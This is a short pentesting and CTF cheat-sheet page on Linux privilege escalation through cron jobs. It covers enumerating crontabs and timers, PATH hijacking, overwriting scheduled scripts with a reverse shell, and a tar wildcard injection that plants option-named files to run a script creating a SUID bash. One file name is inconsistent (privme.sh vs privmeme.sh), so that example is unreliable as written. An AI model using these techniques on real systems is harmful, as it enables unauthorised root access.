Cron jobs

Linux - Privilege Escalation - Internal All The Things

Read the cron jobs then read permissions on any scripts running

cat /etc/crontab

In CTF situations, if there are any custom scripts as cron jobs they're most likely there for a reason, especially ones running as root.

Systemd timers could aslo be running which essentially do the same thing

systemctl list-timers --all

Cron Paths

If the path of the script isn't a the full file path it will check the first path in the PATH variable for it first

Cron Wildcards

If we only have read permissions on a script but it is using a wildcard with another command, we can make that command run something malicious instead

With tar specifically we can make it run a script using touch and checkpoints

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > privme.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh privmeme.sh"

Cron File Overwrites

Check the file permissions on the scheduled script and add a reverse shell to it

PreviousCapabilities Next/etc/passwd override

Last updated 10 months ago